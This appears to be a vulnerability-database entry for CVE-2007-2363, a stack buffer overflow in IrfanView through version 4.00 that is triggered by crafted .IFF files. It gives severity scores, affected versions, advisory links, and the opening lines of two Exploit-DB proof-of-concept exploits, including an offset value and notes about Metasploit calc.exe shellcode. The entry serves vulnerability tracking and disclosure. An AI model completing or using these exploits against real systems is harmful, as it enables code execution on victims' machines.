CVE-2007-2363
Published 2007-04-30
CVE-2007-2363: Buffer overflow in IrfanView 4.00 and earlier allows user-assisted remote attackers to execute arbitrary code via a crafted .IFF file.
Priority: P3 42 · high · 8.5 (CVSS 2.0)
AV:N/AC:M/Au:S/C:C/I:C/A:C
EXPLOIT
EPSS: 8.94% (94.6th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| irfanview | irfanview | <= 4.00 | — |
No detection rules found.
Exploit-DB
IrfanView 3.99 - '.IFF' File Local Stack Buffer Overflow
exploitdb·2008-08-01
---
/*Irfan View 3.99 .IFF File Local Stack Buffer Overflow
This sploit runs calc.exe, tested on Win XP Pro sp3; if
you run it on another vs of Win make sure you change the
retaddress, but it works almost all the time so...
Credits for finding the bug and sploit go to fl0 fl0w.
Gretez to all romanian coderz :) !
Have a blast ! !
*/
#include
#include
#define SF "RO.iff"
#define OFFSET 2100
//shellcode from metasploit
Exploit-DB
IrfanView 4.00 - '.iff' Local Buffer Overflow
exploitdb·2007-04-27
---
/******************************************************************************
* *
* IrfanView *
******************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=138 Encoder=PexFnstenvSub http://metasploit.com */
No writeups or analysis indexed.
http://osvdb.org/35463
http://secunia.com/advisories/25052
http://www.securityfocus.com/bid/23692
http://www.vupen.com/english/advisories/2007/1575
https://exchange.xforce.ibmcloud.com/vulnerabilities/33946
https://www.exploit-db.com/exploits/3811
Published: 2007-04-30